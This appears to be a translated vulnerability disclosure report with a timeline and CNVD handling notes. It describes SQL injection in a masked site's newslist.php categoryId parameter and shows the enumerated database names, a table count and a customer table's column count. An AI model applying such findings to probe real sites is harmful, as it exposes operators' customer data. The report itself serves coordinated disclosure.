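2016-04-30: Details reported to the vendor; awaiting vendor handling
2016-05-05: Vendor confirmed; details disclosed to the vendor only
2016-05-15: Details disclosed to core white hats and experts in the relevant field
2016-05-25: Details disclosed to regular white hats
2016-06-04: Details disclosed to intern white hats
2016-06-19: Details disclosed to the public
I'll throw one in too; not sure whether it's a duplicate~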
http://**.**.**.**/news/newslist.php?categoryId=15
available databases [7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] tubiao
Database: caiso
[86 tables]
Database: caiso
Table: business_customer
[52 columns]
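Short on time, so I won't dig any deeper~
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-05-05 19:48
CNVD did not directly reproduce the situation described; CNVD has notified the site operator by email through its publicly listed contact channel, and the operator is to provide a fix subsequently.
None yet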